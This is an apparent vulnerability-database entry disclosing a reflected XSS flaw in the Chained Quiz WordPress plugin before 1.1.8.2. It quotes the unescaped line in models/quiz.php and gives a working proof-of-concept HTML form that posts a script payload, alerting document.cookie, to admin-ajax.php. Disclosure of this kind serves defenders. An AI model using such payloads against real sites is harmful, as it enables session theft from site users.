Lucene search

K
wpexploitBen ArmstrongWPEX-ID:7E86DA7E-988E-402B-B015-08FB877E40DF
HistoryJan 16, 2020 - 12:00 a.m.

Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS

2020-01-1600:00:00
Ben Armstrong
10

0.001 Low

EPSS

Percentile

37.5%

WordPress Plugin Plugin Chained Quiz before 1.1.8.2 suffers from a Reflected XSS vulnerability in the ‘total_questions’ POST parameter when a user completes a quiz. The code in question accepts the ‘total_questions’ parameter without escaping the special characters: models/quiz.php $output = str_replace(‘{{questions}}’, $_POST[‘total_questions’], $output);

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="x&#32;" />
      <input type="hidden" name="question&#95;id" value="1" />
      <input type="hidden" name="quiz&#95;id" value="1" />
      <input type="hidden" name="post&#95;id"a value="5" />
      <input type="hidden" name="question&#95;type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz&#95;ajax" />
      <input type="hidden" name="chainedquiz&#95;action" value="answer" />
      <input type="hidden" name="total&#95;questions" value="1v4918&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;eyjfw" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

37.5%

Related for WPEX-ID:7E86DA7E-988E-402B-B015-08FB877E40DF